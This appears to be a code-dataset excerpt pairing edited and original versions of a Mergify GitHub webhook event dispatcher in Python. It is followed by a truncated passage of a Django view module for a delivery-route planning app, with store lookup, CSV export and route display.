edited_code stringlengths 17 978k | original_code stringlengths 17 978k |
|---|---|
# -*- encoding: utf-8 -*-
#
# Copyright © 2020 Mergify SAS
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import dataclasses
import typing
import daiquiri
from datadog import statsd
from mergify_engine import check_api
from mergify_engine import config
from mergify_engine import context
from mergify_engine import engine
from mergify_engine import exceptions
from mergify_engine import github_types
from mergify_engine import utils
from mergify_engine import worker
from mergify_engine.engine import commands_runner
LOG = daiquiri.getLogger(__name__)
def meter_event(
event_type: github_types.GitHubEventType, event: github_types.GitHubEvent
) -> None:
tags = [f"event_type:{event_type}"]
if event_type == "pull_request":
event = typing.cast(github_types.GitHubEventPullRequest, event)
tags.append(f"action:{event["action"]}")
if event["action"] == "closed" and event["pull_request"]["merged"]:
if (
event["pull_request"]["merged_by"] is not None
and event["pull_request"]["merged_by"]["login"] == config.BOT_USER_LOGIN
):
tags.append("by_mergify")
statsd.increment("github.events", tags=tags)
def _extract_slim_event(event_type, data):
slim_data = {"sender": data["sender"]}
if event_type == "status":
# To get PR from sha
slim_data["sha"] = data["sha"]
elif event_type == "refresh":
# To get PR from sha or branch name
slim_data["action"] = data["action"]
slim_data["ref"] = data["ref"]
elif event_type == "push":
# To get PR from sha
slim_data["ref"] = data["ref"]
slim_data["before"] = data["before"]
slim_data["after"] = data["after"]
slim_data["pusher"] = data["pusher"]
elif event_type in ("check_suite", "check_run"):
# To get PR from sha
slim_data["action"] = data["action"]
slim_data["app"] = {"id": data[event_type]["app"]["id"]}
slim_data[event_type] = {
"head_sha": data[event_type]["head_sha"],
"pull_requests": [
{
"number": p["number"],
"base": {"repo": {"url": p["base"]["repo"]["url"]}},
}
for p in data[event_type]["pull_requests"]
],
}
elif event_type == "pull_request":
# For pull_request opened/synchronise/closed
slim_data["action"] = data["action"]
elif event_type == "issue_comment":
# For commands runner
slim_data["comment"] = data["comment"]
return slim_data
@dataclasses.dataclass
class IgnoredEvent(Exception):
"""Raised when an is ignored."""
event_type: str
event_id: str
reason: str
def _log_on_exception(exc: Exception, msg: str) -> None:
if exceptions.should_be_ignored(exc) or exceptions.need_retry(exc):
log = LOG.debug
else:
log = LOG.error
log(msg, exc_info=exc)
async def filter_and_dispatch(
redis_cache: utils.RedisCache,
redis_stream: utils.RedisStream,
event_type: github_types.GitHubEventType,
event_id: str,
event: github_types.GitHubEvent,
) -> None:
# TODO(sileht): is statsd async ?
meter_event(event_type, event)
pull_number = None
ignore_reason = None
if event_type == "pull_request":
event = typing.cast(github_types.GitHubEventPullRequest, event)
owner_login = event["repository"]["owner"]["login"]
owner_id = event["repository"]["owner"]["id"]
repo_name = event["repository"]["name"]
pull_number = event["pull_request"]["number"]
if event["repository"]["archived"]:
ignore_reason = "repository archived"
elif event["action"] in ("opened", "synchronize"):
try:
await engine.create_initial_summary(redis_cache, event)
except Exception as e:
_log_on_exception(e, "fail to create initial summary")
elif event_type == "refresh":
event = typing.cast(github_types.GitHubEventRefresh, event)
owner_login = event["repository"]["owner"]["login"]
owner_id = event["repository"]["owner"]["id"]
repo_name = event["repository"]["name"]
if event["pull_request_number"] is not None:
pull_number = event["pull_request_number"]
elif event_type == "pull_request_review_comment":
event = typing.cast(github_types.GitHubEventPullRequestReviewComment, event)
owner_login = event["repository"]["owner"]["login"]
owner_id = event["repository"]["owner"]["id"]
repo_name = event["repository"]["name"]
pull_number = event["pull_request"]["number"]
if event["repository"]["archived"]:
ignore_reason = "repository archived"
elif event_type == "pull_request_review":
event = typing.cast(github_types.GitHubEventPullRequestReview, event)
owner_login = event["repository"]["owner"]["login"]
owner_id = event["repository"]["owner"]["id"]
repo_name = event["repository"]["name"]
pull_number = event["pull_request"]["number"]
elif event_type == "issue_comment":
event = typing.cast(github_types.GitHubEventIssueComment, event)
owner_login = event["repository"]["owner"]["login"]
owner_id = event["repository"]["owner"]["id"]
repo_name = event["repository"]["name"]
pull_number = github_types.GitHubPullRequestNumber(event["issue"]["number"])
if event["repository"]["archived"]:
ignore_reason = "repository archived"
elif "pull_request" not in event["issue"]:
ignore_reason = "comment is not on a pull request"
elif event["action"] != "created":
ignore_reason = f"comment has been {event["action"]}"
elif (
"@mergify " not in event["comment"]["body"].lower()
and "@mergifyio " not in event["comment"]["body"].lower()
):
ignore_reason = "comment is not for Mergify"
else:
# NOTE(sileht): nothing important should happen in this hook as we don't retry it
try:
await commands_runner.on_each_event(event)
except Exception as e:
_log_on_exception(e, "commands_runner.on_each_event failed")
elif event_type == "status":
event = typing.cast(github_types.GitHubEventStatus, event)
owner_login = event["repository"]["owner"]["login"]
owner_id = event["repository"]["owner"]["id"]
repo_name = event["repository"]["name"]
if event["repository"]["archived"]:
ignore_reason = "repository archived"
elif event_type == "push":
event = typing.cast(github_types.GitHubEventPush, event)
owner_login = event["repository"]["owner"]["login"]
owner_id = event["repository"]["owner"]["id"]
repo_name = event["repository"]["name"]
if event["repository"]["archived"]:
ignore_reason = "repository archived"
elif not event["ref"].startswith("refs/heads/"):
ignore_reason = f"push on {event["ref"]}"
elif event["repository"]["archived"]: # pragma: no cover
ignore_reason = "repository archived"
elif event_type == "check_suite":
event = typing.cast(github_types.GitHubEventCheckSuite, event)
owner_login = event["repository"]["owner"]["login"]
owner_id = event["repository"]["owner"]["id"]
repo_name = event["repository"]["name"]
if event["repository"]["archived"]:
ignore_reason = "repository archived"
elif event["action"] != "rerequested":
ignore_reason = f"check_suite/{event["action"]}"
elif (
event[event_type]["app"]["id"] == config.INTEGRATION_ID
and event["action"] != "rerequested"
and event[event_type].get("external_id") != check_api.USER_CREATED_CHECKS
):
ignore_reason = f"mergify {event_type}"
elif event_type == "check_run":
event = typing.cast(github_types.GitHubEventCheckRun, event)
owner_login = event["repository"]["owner"]["login"]
owner_id = event["repository"]["owner"]["id"]
repo_name = event["repository"]["name"]
if event["repository"]["archived"]:
ignore_reason = "repository archived"
elif (
event[event_type]["app"]["id"] == config.INTEGRATION_ID
and event["action"] != "rerequested"
and event[event_type].get("external_id") != check_api.USER_CREATED_CHECKS
):
ignore_reason = f"mergify {event_type}"
elif event_type == "organization":
event = typing.cast(github_types.GitHubEventOrganization, event)
owner_login = event["organization"]["login"]
owner_id = event["organization"]["id"]
repo_name = None
ignore_reason = "organization event"
if event["action"] == "deleted":
await context.Installation.clear_team_members_cache_for_org(
redis_cache, event["organization"]
)
if event["action"] in ("deleted", "member_added", "member_removed"):
await context.Repository.clear_user_permission_cache_for_org(
redis_cache, event["organization"]
)
elif event_type == "member":
event = typing.cast(github_types.GitHubEventMember, event)
owner_login = event["repository"]["owner"]["login"]
owner_id = event["repository"]["owner"]["id"]
repo_name = event["repository"]["name"]
ignore_reason = "member event"
await context.Repository.clear_user_permission_cache_for_user(
redis_cache,
event["repository"]["owner"],
event["repository"],
event["member"],
)
elif event_type == "membership":
event = typing.cast(github_types.GitHubEventMembership, event)
owner_login = event["organization"]["login"]
owner_id = event["organization"]["id"]
repo_name = None
ignore_reason = "membership event"
if "slug" in event["team"]:
await context.Installation.clear_team_members_cache_for_team(
redis_cache, event["organization"], event["team"]["slug"]
)
else:
# Deleted team
await context.Installation.clear_team_members_cache_for_org(
redis_cache,
event["organization"],
)
await context.Repository.clear_user_permission_cache_for_org(
redis_cache, event["organization"]
)
elif event_type == "team":
event = typing.cast(github_types.GitHubEventTeam, event)
owner_login = event["organization"]["login"]
owner_id = event["organization"]["id"]
repo_name = None
ignore_reason = "team event"
if event["action"] in ("edited", "deleted"):
await context.Installation.clear_team_members_cache_for_team(
redis_cache, event["organization"], event["team"]["slug"]
)
if event["action"] in (
"edited",
"added_to_repository",
"removed_from_repository",
"deleted",
):
if "repository" in event:
await context.Repository.clear_user_permission_cache_for_repo(
redis_cache, event["organization"], event["repository"]
)
else:
await context.Repository.clear_user_permission_cache_for_org(
redis_cache, event["organization"]
)
elif event_type == "team_add":
event = typing.cast(github_types.GitHubEventTeamAdd, event)
owner_login = event["repository"]["owner"]["login"]
owner_id = event["repository"]["owner"]["id"]
repo_name = event["repository"]["name"]
ignore_reason = "team_add event"
await context.Repository.clear_user_permission_cache_for_repo(
redis_cache, event["repository"]["owner"], event["repository"]
)
else:
owner_login = "<unknown>"
owner_id = "<unknown>"
repo_name = "<unknown>"
ignore_reason = "unexpected event_type"
if ignore_reason is None:
msg_action = "pushed to worker"
slim_event = _extract_slim_event(event_type, event)
await worker.push(
redis_stream,
owner_id,
owner_login,
repo_name,
pull_number,
event_type,
slim_event,
)
else:
msg_action = f"ignored: {ignore_reason}"
LOG.info(
"GithubApp event %s",
msg_action,
event_type=event_type,
event_id=event_id,
sender=event["sender"]["login"],
gh_owner=owner_login,
gh_repo=repo_name,
)
if ignore_reason:
raise IgnoredEvent(event_type, event_id, ignore_reason)
SHA_EXPIRATION = 60
async def _get_github_pulls_from_sha(
installation: context.Installation,
repo_name: github_types.GitHubRepositoryName,
sha: github_types.SHAType,
pulls: typing.List[github_types.GitHubPullRequest],
) -> typing.List[github_types.GitHubPullRequestNumber]:
cache_key = f"sha~{installation.owner_login}~{repo_name}~{sha}"
pull_number = await installation.redis.get(cache_key)
if pull_number is None:
for pull in pulls:
if pull["head"]["sha"] == sha:
await installation.redis.set(
cache_key, pull["number"], ex=SHA_EXPIRATION
)
return [pull["number"]]
return []
else:
return [github_types.GitHubPullRequestNumber(int(pull_number))]
async def extract_pull_numbers_from_event(
installation: context.Installation,
repo_name: github_types.GitHubRepositoryName,
event_type: github_types.GitHubEventType,
data: github_types.GitHubEvent,
opened_pulls: typing.List[github_types.GitHubPullRequest],
) -> typing.List[github_types.GitHubPullRequestNumber]:
# NOTE(sileht): Don't fail if we received even on repo that doesn't exists anymore
if event_type == "refresh":
data = typing.cast(github_types.GitHubEventRefresh, data)
if (pull_request_number := data.get("pull_request_number")) is not None:
return [pull_request_number]
elif (ref := data.get("ref")) is None:
return [p["number"] for p in opened_pulls]
else:
branch = ref[11:] # refs/heads/
return [p["number"] for p in opened_pulls if p["base"]["ref"] == branch]
elif event_type == "push":
data = typing.cast(github_types.GitHubEventPush, data)
branch = data["ref"][11:] # refs/heads/
return [p["number"] for p in opened_pulls if p["base"]["ref"] == branch]
elif event_type == "status":
data = typing.cast(github_types.GitHubEventStatus, data)
return await _get_github_pulls_from_sha(
installation, repo_name, data["sha"], opened_pulls
)
elif event_type == "check_suite":
data = typing.cast(github_types.GitHubEventCheckSuite, data)
# NOTE(sileht): This list may contains Pull Request from another org/user fork...
base_repo_url = (
f"{config.GITHUB_API_URL}/repos/{installation.owner_login}/{repo_name}"
)
pulls = [
p["number"]
for p in data[event_type]["pull_requests"]
if p["base"]["repo"]["url"] == base_repo_url
]
if not pulls:
sha = data[event_type]["head_sha"]
pulls = await _get_github_pulls_from_sha(
installation, repo_name, sha, opened_pulls
)
return pulls
elif event_type == "check_run":
data = typing.cast(github_types.GitHubEventCheckRun, data)
# NOTE(sileht): This list may contains Pull Request from another org/user fork...
base_repo_url = (
f"{config.GITHUB_API_URL}/repos/{installation.owner_login}/{repo_name}"
)
pulls = [
p["number"]
for p in data[event_type]["pull_requests"]
if p["base"]["repo"]["url"] == base_repo_url
]
if not pulls:
sha = data[event_type]["head_sha"]
pulls = await _get_github_pulls_from_sha(
installation, repo_name, sha, opened_pulls
)
return pulls
else:
return []
| # -*- encoding: utf-8 -*-
#
# Copyright © 2020 Mergify SAS
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import dataclasses
import typing
import daiquiri
from datadog import statsd
from mergify_engine import check_api
from mergify_engine import config
from mergify_engine import context
from mergify_engine import engine
from mergify_engine import exceptions
from mergify_engine import github_types
from mergify_engine import utils
from mergify_engine import worker
from mergify_engine.engine import commands_runner
LOG = daiquiri.getLogger(__name__)
def meter_event(
event_type: github_types.GitHubEventType, event: github_types.GitHubEvent
) -> None:
tags = [f"event_type:{event_type}"]
if event_type == "pull_request":
event = typing.cast(github_types.GitHubEventPullRequest, event)
tags.append(f"action:{event['action']}")
if event["action"] == "closed" and event["pull_request"]["merged"]:
if (
event["pull_request"]["merged_by"] is not None
and event["pull_request"]["merged_by"]["login"] == config.BOT_USER_LOGIN
):
tags.append("by_mergify")
statsd.increment("github.events", tags=tags)
def _extract_slim_event(event_type, data):
slim_data = {"sender": data["sender"]}
if event_type == "status":
# To get PR from sha
slim_data["sha"] = data["sha"]
elif event_type == "refresh":
# To get PR from sha or branch name
slim_data["action"] = data["action"]
slim_data["ref"] = data["ref"]
elif event_type == "push":
# To get PR from sha
slim_data["ref"] = data["ref"]
slim_data["before"] = data["before"]
slim_data["after"] = data["after"]
slim_data["pusher"] = data["pusher"]
elif event_type in ("check_suite", "check_run"):
# To get PR from sha
slim_data["action"] = data["action"]
slim_data["app"] = {"id": data[event_type]["app"]["id"]}
slim_data[event_type] = {
"head_sha": data[event_type]["head_sha"],
"pull_requests": [
{
"number": p["number"],
"base": {"repo": {"url": p["base"]["repo"]["url"]}},
}
for p in data[event_type]["pull_requests"]
],
}
elif event_type == "pull_request":
# For pull_request opened/synchronise/closed
slim_data["action"] = data["action"]
elif event_type == "issue_comment":
# For commands runner
slim_data["comment"] = data["comment"]
return slim_data
@dataclasses.dataclass
class IgnoredEvent(Exception):
"""Raised when an is ignored."""
event_type: str
event_id: str
reason: str
def _log_on_exception(exc: Exception, msg: str) -> None:
if exceptions.should_be_ignored(exc) or exceptions.need_retry(exc):
log = LOG.debug
else:
log = LOG.error
log(msg, exc_info=exc)
async def filter_and_dispatch(
redis_cache: utils.RedisCache,
redis_stream: utils.RedisStream,
event_type: github_types.GitHubEventType,
event_id: str,
event: github_types.GitHubEvent,
) -> None:
# TODO(sileht): is statsd async ?
meter_event(event_type, event)
pull_number = None
ignore_reason = None
if event_type == "pull_request":
event = typing.cast(github_types.GitHubEventPullRequest, event)
owner_login = event["repository"]["owner"]["login"]
owner_id = event["repository"]["owner"]["id"]
repo_name = event["repository"]["name"]
pull_number = event["pull_request"]["number"]
if event["repository"]["archived"]:
ignore_reason = "repository archived"
elif event["action"] in ("opened", "synchronize"):
try:
await engine.create_initial_summary(redis_cache, event)
except Exception as e:
_log_on_exception(e, "fail to create initial summary")
elif event_type == "refresh":
event = typing.cast(github_types.GitHubEventRefresh, event)
owner_login = event["repository"]["owner"]["login"]
owner_id = event["repository"]["owner"]["id"]
repo_name = event["repository"]["name"]
if event["pull_request_number"] is not None:
pull_number = event["pull_request_number"]
elif event_type == "pull_request_review_comment":
event = typing.cast(github_types.GitHubEventPullRequestReviewComment, event)
owner_login = event["repository"]["owner"]["login"]
owner_id = event["repository"]["owner"]["id"]
repo_name = event["repository"]["name"]
pull_number = event["pull_request"]["number"]
if event["repository"]["archived"]:
ignore_reason = "repository archived"
elif event_type == "pull_request_review":
event = typing.cast(github_types.GitHubEventPullRequestReview, event)
owner_login = event["repository"]["owner"]["login"]
owner_id = event["repository"]["owner"]["id"]
repo_name = event["repository"]["name"]
pull_number = event["pull_request"]["number"]
elif event_type == "issue_comment":
event = typing.cast(github_types.GitHubEventIssueComment, event)
owner_login = event["repository"]["owner"]["login"]
owner_id = event["repository"]["owner"]["id"]
repo_name = event["repository"]["name"]
pull_number = github_types.GitHubPullRequestNumber(event["issue"]["number"])
if event["repository"]["archived"]:
ignore_reason = "repository archived"
elif "pull_request" not in event["issue"]:
ignore_reason = "comment is not on a pull request"
elif event["action"] != "created":
ignore_reason = f"comment has been {event['action']}"
elif (
"@mergify " not in event["comment"]["body"].lower()
and "@mergifyio " not in event["comment"]["body"].lower()
):
ignore_reason = "comment is not for Mergify"
else:
# NOTE(sileht): nothing important should happen in this hook as we don't retry it
try:
await commands_runner.on_each_event(event)
except Exception as e:
_log_on_exception(e, "commands_runner.on_each_event failed")
elif event_type == "status":
event = typing.cast(github_types.GitHubEventStatus, event)
owner_login = event["repository"]["owner"]["login"]
owner_id = event["repository"]["owner"]["id"]
repo_name = event["repository"]["name"]
if event["repository"]["archived"]:
ignore_reason = "repository archived"
elif event_type == "push":
event = typing.cast(github_types.GitHubEventPush, event)
owner_login = event["repository"]["owner"]["login"]
owner_id = event["repository"]["owner"]["id"]
repo_name = event["repository"]["name"]
if event["repository"]["archived"]:
ignore_reason = "repository archived"
elif not event["ref"].startswith("refs/heads/"):
ignore_reason = f"push on {event['ref']}"
elif event["repository"]["archived"]: # pragma: no cover
ignore_reason = "repository archived"
elif event_type == "check_suite":
event = typing.cast(github_types.GitHubEventCheckSuite, event)
owner_login = event["repository"]["owner"]["login"]
owner_id = event["repository"]["owner"]["id"]
repo_name = event["repository"]["name"]
if event["repository"]["archived"]:
ignore_reason = "repository archived"
elif event["action"] != "rerequested":
ignore_reason = f"check_suite/{event['action']}"
elif (
event[event_type]["app"]["id"] == config.INTEGRATION_ID
and event["action"] != "rerequested"
and event[event_type].get("external_id") != check_api.USER_CREATED_CHECKS
):
ignore_reason = f"mergify {event_type}"
elif event_type == "check_run":
event = typing.cast(github_types.GitHubEventCheckRun, event)
owner_login = event["repository"]["owner"]["login"]
owner_id = event["repository"]["owner"]["id"]
repo_name = event["repository"]["name"]
if event["repository"]["archived"]:
ignore_reason = "repository archived"
elif (
event[event_type]["app"]["id"] == config.INTEGRATION_ID
and event["action"] != "rerequested"
and event[event_type].get("external_id") != check_api.USER_CREATED_CHECKS
):
ignore_reason = f"mergify {event_type}"
elif event_type == "organization":
event = typing.cast(github_types.GitHubEventOrganization, event)
owner_login = event["organization"]["login"]
owner_id = event["organization"]["id"]
repo_name = None
ignore_reason = "organization event"
if event["action"] == "deleted":
await context.Installation.clear_team_members_cache_for_org(
redis_cache, event["organization"]
)
if event["action"] in ("deleted", "member_added", "member_removed"):
await context.Repository.clear_user_permission_cache_for_org(
redis_cache, event["organization"]
)
elif event_type == "member":
event = typing.cast(github_types.GitHubEventMember, event)
owner_login = event["repository"]["owner"]["login"]
owner_id = event["repository"]["owner"]["id"]
repo_name = event["repository"]["name"]
ignore_reason = "member event"
await context.Repository.clear_user_permission_cache_for_user(
redis_cache,
event["repository"]["owner"],
event["repository"],
event["member"],
)
elif event_type == "membership":
event = typing.cast(github_types.GitHubEventMembership, event)
owner_login = event["organization"]["login"]
owner_id = event["organization"]["id"]
repo_name = None
ignore_reason = "membership event"
if "slug" in event["team"]:
await context.Installation.clear_team_members_cache_for_team(
redis_cache, event["organization"], event["team"]["slug"]
)
else:
# Deleted team
await context.Installation.clear_team_members_cache_for_org(
redis_cache,
event["organization"],
)
await context.Repository.clear_user_permission_cache_for_org(
redis_cache, event["organization"]
)
elif event_type == "team":
event = typing.cast(github_types.GitHubEventTeam, event)
owner_login = event["organization"]["login"]
owner_id = event["organization"]["id"]
repo_name = None
ignore_reason = "team event"
if event["action"] in ("edited", "deleted"):
await context.Installation.clear_team_members_cache_for_team(
redis_cache, event["organization"], event["team"]["slug"]
)
if event["action"] in (
"edited",
"added_to_repository",
"removed_from_repository",
"deleted",
):
if "repository" in event:
await context.Repository.clear_user_permission_cache_for_repo(
redis_cache, event["organization"], event["repository"]
)
else:
await context.Repository.clear_user_permission_cache_for_org(
redis_cache, event["organization"]
)
elif event_type == "team_add":
event = typing.cast(github_types.GitHubEventTeamAdd, event)
owner_login = event["repository"]["owner"]["login"]
owner_id = event["repository"]["owner"]["id"]
repo_name = event["repository"]["name"]
ignore_reason = "team_add event"
await context.Repository.clear_user_permission_cache_for_repo(
redis_cache, event["repository"]["owner"], event["repository"]
)
else:
owner_login = "<unknown>"
owner_id = "<unknown>"
repo_name = "<unknown>"
ignore_reason = "unexpected event_type"
if ignore_reason is None:
msg_action = "pushed to worker"
slim_event = _extract_slim_event(event_type, event)
await worker.push(
redis_stream,
owner_id,
owner_login,
repo_name,
pull_number,
event_type,
slim_event,
)
else:
msg_action = f"ignored: {ignore_reason}"
LOG.info(
"GithubApp event %s",
msg_action,
event_type=event_type,
event_id=event_id,
sender=event["sender"]["login"],
gh_owner=owner_login,
gh_repo=repo_name,
)
if ignore_reason:
raise IgnoredEvent(event_type, event_id, ignore_reason)
SHA_EXPIRATION = 60
async def _get_github_pulls_from_sha(
installation: context.Installation,
repo_name: github_types.GitHubRepositoryName,
sha: github_types.SHAType,
pulls: typing.List[github_types.GitHubPullRequest],
) -> typing.List[github_types.GitHubPullRequestNumber]:
cache_key = f"sha~{installation.owner_login}~{repo_name}~{sha}"
pull_number = await installation.redis.get(cache_key)
if pull_number is None:
for pull in pulls:
if pull["head"]["sha"] == sha:
await installation.redis.set(
cache_key, pull["number"], ex=SHA_EXPIRATION
)
return [pull["number"]]
return []
else:
return [github_types.GitHubPullRequestNumber(int(pull_number))]
async def extract_pull_numbers_from_event(
installation: context.Installation,
repo_name: github_types.GitHubRepositoryName,
event_type: github_types.GitHubEventType,
data: github_types.GitHubEvent,
opened_pulls: typing.List[github_types.GitHubPullRequest],
) -> typing.List[github_types.GitHubPullRequestNumber]:
# NOTE(sileht): Don't fail if we received even on repo that doesn't exists anymore
if event_type == "refresh":
data = typing.cast(github_types.GitHubEventRefresh, data)
if (pull_request_number := data.get("pull_request_number")) is not None:
return [pull_request_number]
elif (ref := data.get("ref")) is None:
return [p["number"] for p in opened_pulls]
else:
branch = ref[11:] # refs/heads/
return [p["number"] for p in opened_pulls if p["base"]["ref"] == branch]
elif event_type == "push":
data = typing.cast(github_types.GitHubEventPush, data)
branch = data["ref"][11:] # refs/heads/
return [p["number"] for p in opened_pulls if p["base"]["ref"] == branch]
elif event_type == "status":
data = typing.cast(github_types.GitHubEventStatus, data)
return await _get_github_pulls_from_sha(
installation, repo_name, data["sha"], opened_pulls
)
elif event_type == "check_suite":
data = typing.cast(github_types.GitHubEventCheckSuite, data)
# NOTE(sileht): This list may contains Pull Request from another org/user fork...
base_repo_url = (
f"{config.GITHUB_API_URL}/repos/{installation.owner_login}/{repo_name}"
)
pulls = [
p["number"]
for p in data[event_type]["pull_requests"]
if p["base"]["repo"]["url"] == base_repo_url
]
if not pulls:
sha = data[event_type]["head_sha"]
pulls = await _get_github_pulls_from_sha(
installation, repo_name, sha, opened_pulls
)
return pulls
elif event_type == "check_run":
data = typing.cast(github_types.GitHubEventCheckRun, data)
# NOTE(sileht): This list may contains Pull Request from another org/user fork...
base_repo_url = (
f"{config.GITHUB_API_URL}/repos/{installation.owner_login}/{repo_name}"
)
pulls = [
p["number"]
for p in data[event_type]["pull_requests"]
if p["base"]["repo"]["url"] == base_repo_url
]
if not pulls:
sha = data[event_type]["head_sha"]
pulls = await _get_github_pulls_from_sha(
installation, repo_name, sha, opened_pulls
)
return pulls
else:
return []
|
from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.contrib.auth.forms import AuthenticationForm
from .forms import *
from django.contrib.auth import login, logout, authenticate
from django.contrib import messages
from django.apps import apps
from django.conf import settings
from django.core.paginator import Paginator
import json
import operator
from django.db.models import Q
from .route import RouteCalc, format_to_time, format_to_km, output_result_db_to_csv, format_to_duration
import os
import copy
# #Главная
# def homepage(request):
# #return HttpResponse("Test response")
# return render(request=request,
# template_name='main/home.html',
# context={'AccLogs': AccessLog.objects.all()}
# )
#Ajax запрос списка складов с их кодами
def ajax_getStores(request):
results = {}
if request.is_ajax():
def get_res_store():
q = request.GET.get('term', '')
if not q:
return
search_qs = Store.objects.filter(Q(name__icontains=q) | Q(ns_code__icontains=q))[:5]
for r in search_qs:
results[f"{r.ns_code} {r.name}"] = ''
return results
results = get_res_store()
data = json.dumps(results)
return HttpResponse(data, 'application/json')
#Сохранение маршрута в файл
def saveroute_request(route_set, file_format):
if file_format != 'csv':
return redirect("main:homepage")
filepath = output_result_db_to_csv(route_set)
filew = open(filepath,"rb")
response = HttpResponse(filew.read(), content_type='text/csv')
response['Content-Disposition'] = f'attachment; filename="{route_set.get_short_desc()}.csv"'
filew.close()
os.remove(filepath)
return response
#Просмотр маршрута
def viewroute_request(request):
# if not request.user.is_authenticated:
# return redirect("main:login")
try:
calc_id = int(request.GET.get('id', ''))
gr_variant = int(request.GET.get('gr', 0))
reis_variant = int(request.GET.get('reis', 0))
save_request = request.GET.get('save', '')
route_set = RouteSet.objects.get(id=calc_id)
route_stat = RouteStat.objects.get(route_set=route_set)
except:
messages.error(request, "Неверная ссылка на расчет!")
return redirect("main:homepage")
if not route_stat.reis_count: # Пустой расчет
return render(
request,
'main/message.html',
context={'page_title': 'Пустой расчет',
'msg_title': 'Пустой расчет',
'msg_body': '<h5><p>Расчет не удался.<br>' +
'Попробуйте указать менее строгие параметры расчета</p></h5>' +
f'<p>{route_set}</p>',
})
def in_dictlist(val, dict):
for key, dval in dict:
if key == val: return True
return False
if save_request:
return saveroute_request(route_set, save_request)
#список графиков для комбобокса
route_list = Route.objects.filter(route_set=route_set)
gr_list = []
for graph in route_list.values_list('graph', flat=True).distinct():
gr_list.append((graph, f"Гр. {graph}"))
gr_list.sort(key = operator.itemgetter(0))
if not in_dictlist(gr_variant, gr_list): gr_variant = gr_list[0][0]
#Список рейсов для комбобокса
reis_list = []
for route in route_list.filter(graph=gr_variant):
reis_list.append((route.reis, f"Рейс {route.reis}"))
if not in_dictlist(reis_variant, reis_list): reis_variant = reis_list[0][0]
#поиск текущего выводимого маршрута
current_route = route_list.get(graph=gr_variant, reis=reis_variant)
#общая статистика
route_stat.costs = format_to_duration(route_stat.costs)
#автомобиль
if not current_route.dyn_auto: # Статический
real_auto = {
"name": current_route.get_auto().name,
"capacity": int(current_route.get_auto().capacity),
"used_capacity": int(current_route.get_used_capacity()),
"driver_limit": format_to_time(current_route.get_auto().driver_limit),
"used_driver_limit": format_to_time(current_route.get_auto().get_used_driver_limit()),
}
else: # Динамический
#Поиск времени работы водителя
first_route = Route.objects.filter(route_set=route_set).filter(graph=current_route.graph).order_by('reis')[0]
last_route = Route.objects.filter(route_set=route_set).filter(graph=current_route.graph).order_by('-reis')[0]
used_driver_limit = last_route.reis_start + last_route.get_all_time() - first_route.reis_start
real_auto = {
"name": f"Дин.авто ({current_route.graph})",
"capacity": int(route_stat.dyn_auto_capacity),
"used_capacity": int(current_route.get_used_capacity()),
"driver_limit": format_to_time(route_stat.dyn_auto_driver_limit),
"used_driver_limit": format_to_time(used_driver_limit),
}
#Статистика конкретного маршрута
reis_stat = {
"all_distance": format_to_km(current_route.get_all_distance()),
"all_time": format_to_duration(current_route.get_all_time_with_startwait()),
"delivery_dots_count": current_route.get_delivery_dots_count(),
}
#Маршрут
route_tpl = []
#добавление склада
store_wait_time = current_route.reis_start - current_route.get_start_time_with_startwait() #Ожидание выезда со склада
route_tpl.append({
'num': 1,
'name': f"{route_set.store.ns_code} {route_set.store.name}",
'address': route_set.store.address,
'distance': 0,
'latitude': route_set.store.latitude,
'longtitude': route_set.store.longtitude,
'time_in': format_to_time(current_route.reis_start),
'time_out': format_to_time(current_route.reis_start + current_route.load_time),
'wait_time': ('' if not store_wait_time else format_to_time(store_wait_time)),
'type': 'store'
})
#добавление магазинов
delivery_dots = RouteDot.objects.filter(route=current_route).order_by('num')
last_dot_num = 1
last_time_out = current_route.reis_start
last_coord = {'latitude': '', 'longtitude': ''}
for dot in delivery_dots:
dot_init = dot.get_init_dot()
dot_client = dot_init.client
if dot_client:
client_name = f"{dot_client.ns_code} {dot_init.client_name}"
else:
client_name = dot_init.client_name
client_address = dot_client.address if dot_client else ''
dot_latitude = dot_init.latitude
dot_longtitude = dot_init.longtitude
if not dot_latitude or not dot_longtitude:
dot_latitude = dot_client.latitude
dot_longtitude = dot_client.longtitude
if not (last_coord['latitude'] == dot_latitude and last_coord['longtitude'] == dot_longtitude):
last_dot_num += 1 #С одинаковыми координатами считаем что точка та же самая
route_tpl.append({
'num': last_dot_num,
'name': client_name,
'address': client_address,
'distance': format_to_km(dot.distance),
'latitude': dot_latitude,
'longtitude': dot_longtitude,
'time_in': format_to_time(dot.time_in),
'time_out': format_to_time(dot.time_out),
'wait_time': ('' if not dot.wait_time else format_to_time(dot.wait_time)),
'type': 'client',
})
last_time_out = dot.time_out
last_coord = {'latitude': dot_latitude, 'longtitude': dot_longtitude}
#добавление склада в конец маршрута (если необходимо)
if route_stat.with_return:
store_dot = copy.deepcopy(route_tpl[0])
store_dot['num'] = 1
store_dot['distance'] = format_to_km(current_route.store_return_distance)
store_dot['time_in'] = format_to_time(last_time_out + current_route.store_return_time)
store_dot['time_out'] = ''
store_dot['wait_time'] = ''
route_tpl.append(store_dot)
#Нераспределенные точки
unallocated_dots = []
u_dots = route_set.get_unallocated_delivery_dots()
for dot in u_dots:
dot_client = dot.client
if dot_client:
client_name = f"{dot_client.ns_code} {dot.client_name}"
else:
client_name = dot.client_name
client_address = dot_client.address if dot_client else ''
unallocated_dots.append({
'name': client_name,
'address': client_address,
'quantity': dot.quantity,
'window_in': format_to_time(dot.window_in),
'window_out': format_to_time(dot.window_out),
})
form = RouteForm(
initial={
'gr': gr_variant,
'reis': reis_variant,
'id': calc_id
},
gr_list=gr_list,
reis_list=reis_list
)
return render(request,
'main/viewroute.html',
context={'form': form,
'gr_list': gr_list,
'route_set': route_set,
'calculate_stat': route_stat,
'real_auto': real_auto,
'reis_stat': reis_stat,
'route': route_tpl,
'calc_id': calc_id,
